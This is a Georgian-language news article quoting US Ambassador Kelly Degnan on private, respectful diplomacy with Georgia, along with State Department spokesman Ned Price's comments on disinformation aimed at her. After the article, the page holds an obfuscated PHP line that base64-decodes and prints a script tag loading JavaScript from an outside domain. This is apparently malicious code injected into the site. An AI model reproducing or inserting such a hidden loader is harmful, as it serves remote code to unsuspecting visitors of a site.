celsiusi
ავერსი შნაიდერი
ის რაც თქვა ნედ პრაისმა, მართალია, ჩვენ უნდა გამოვხატოთ პატივისცემა, უნდა მოვეპყროთ ერთმანეთს როგორც პარტნიორები და ვფიქრობ სწორედ ეს უნდა იყოს პრიორიტეტი - ძალიან ბუნებრივია, რომ შეიძლება იყოს უთანხმოება მეგობრებს და პარტნიორებს შორისაც, მაგრამ ამის განხილვის საუკეთესო გზა პრივატულად განხილვაა. საბოლოოდ, როგორც დიპლომატმა შემიძლია ვთქვა, რომ უკეთესია პირდაპირი პრივატული ჩართულობა გულწრფელი, თუმცა ყოველთვის პატივისცემით სავსე. ამას ყველა იმსახურებს, - ამის შესახებ ამერიკის შეერთებული შტატების ელჩმა კელი დეგნანმა განაცხადა.
 
მისი თქმით, ვაშინგტონი ძალიან კარგად არის ინფორმირებული იმის შესახებ, რაც ხდება საქართველოში, თვალს ადევნებს ახალი ამბების განვითარებას და გამოხატავს დიდ ინტერესს.
 
„მე ყოველთვის მოხარული ვარ გავცე პასუხები კითხვებს, როგორც ამერიკის შეერთებული შტატების ელჩმა საქართველოში და როგორც აშშ-ის პრეზიდენტის წარმომადგენელმა. მე ყოველთვის მზად ვარ გავცე კითხვებს პასუხი, რომელიც ამერიკის შეერთებული შტატების საქართველოში მუშაობას ეხება. ჩვენ საქართველოში ქართველი ხალხის მხარდასაჭერად ვართ, ვინც მიისწრაფვის გახდეს ევროატლანტიკური ოჯახის წევრი. როგორც თქვენ მოისმინეთ ნედ პრაისისგან, ვაშინგტონი ძალიან კარგად არის ინფორმირებული იმის შესახებ რაც ხდება საქართველოში, თვალს ადევნებს ახალი ამბების განვითარებას საქართველოში და გამოხატავს დიდ ინტერესს იმიტომ, რომ საქართველო არის აშშ-ის მნიშვნელოვანი პარტნიორი და ჩვენ ღრმად ვართ დაინტერესებულები ამ ქვეყნის წარმატებით. სწორედ ამიტომ ვუჭერდით მხარს საქართველოს ამდენად ფართოდ უკანასკნელი 30 წლის განმავლობაში. ახლახან ვიყავი სვანეთში და სამეგრელოს რეგიონში და მშვენიერი იყო ყველა იმ პროექტის და ადამიანის ნახვა, ვისაც ამერიკის შეერთებული შტატები წლების განმავლობაში ეხმარება ჯანდაცვის, განათლების, უსაფრთხოების, ეკონომიკური განვითარების კუთხით. ეს ძალიან კარგი გამეორება იყო იმისა, რომ საქართველოს მოსახლეობას სურს ამ გზის გაგრძელება და აშშ ძალიან ამაყია, რომ ჩვენ ამის მხარდაჭერა შეგვიძლია.
 
როგორც ნედ პრაისმა თქვა, ეს არ არის გზა, რომლითაც პარტნიორები ერთმანეთს ეკონტაქტებიან. მე დიპლომატი ვარ, შეერთებული შტატების ხალხს წარმოვადგენ. არ ვიღებ არაფერს რაც აქ ხდება პიროვნულად, რადგან მე წარმოვადგენ ამერიკელ ხალხს და ამერიკის შეერთებული შტატების პრეზიდენტს. ის რაც თქვა ნედ პრაისმა, მართალია. ჩვენ უნდა გამოვხატოთ პატივისცემა, უნდა მოვეპყროთ ერთმანეთს, როგორც პარტნიორები და ვფიქრობ, სწორედ ეს უნდა იყოს პრიორიტეტი. ნებისმიერი სახის ჭორები და სპეკულაციები და განცხადებები, რომლებიც არ ეფუძნება ფაქტებს, შეიძლება შეცდომაში შემყვანი იყოს ქართველი ხალხისთვის და არ ვფიქრობ, რომ ეს რამენაირად დაეხმარება დიალოგს. სწორი მიდგომაა, რომ განსხვავებების განხილვა პირადად მოხდეს. ძალიან ბუნებრივია, რომ შეიძლება იყოს უთანხმოება მეგობრებს და პარტნიორებს შორისაც, მაგრამ ამის განხილვის საუკეთესო გზა პრივატულად განხილვაა. საბოლოოდ, როგორც დიპლომატმა, შემიძლია ვთქვა, რომ უკეთესია პირდაპირი პრივატული ჩართულობა გულწრფელი, თუმცა ყოველთვის პატივისცემით სავსე. ამას ყველა იმსახურებს“, - განაცხადა დეგნანმა.
 
ცნობისათვის, აშშ- ის სახელმწიფო დეპარტამენტის პრეს-სპიკერმა ნედ პრაისმა გუშინ ბრიფინგი საქართველოზე საუბრით გახსნა. მისი თქმით, დეზინფორმაცია და პერსონალური თავდასხმები აშშ- ის ელჩ კელი დეგნანზე და მის გუნდზე არ შეესაბამება პარტნიორობს შორის არსებულ კომუნიკაციას. მისივე განცხადებით, აშშ მხარს უჭერს ქართველი ხალხის ევროპულ მისწრაფებებს, თუმცა, ზოგიერთი ქართველი ოფიციალური პირის რიტორიკა მოსახლეობის ამ მიზნიდან ყურადღების გადატანას ემსახურება.
486
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");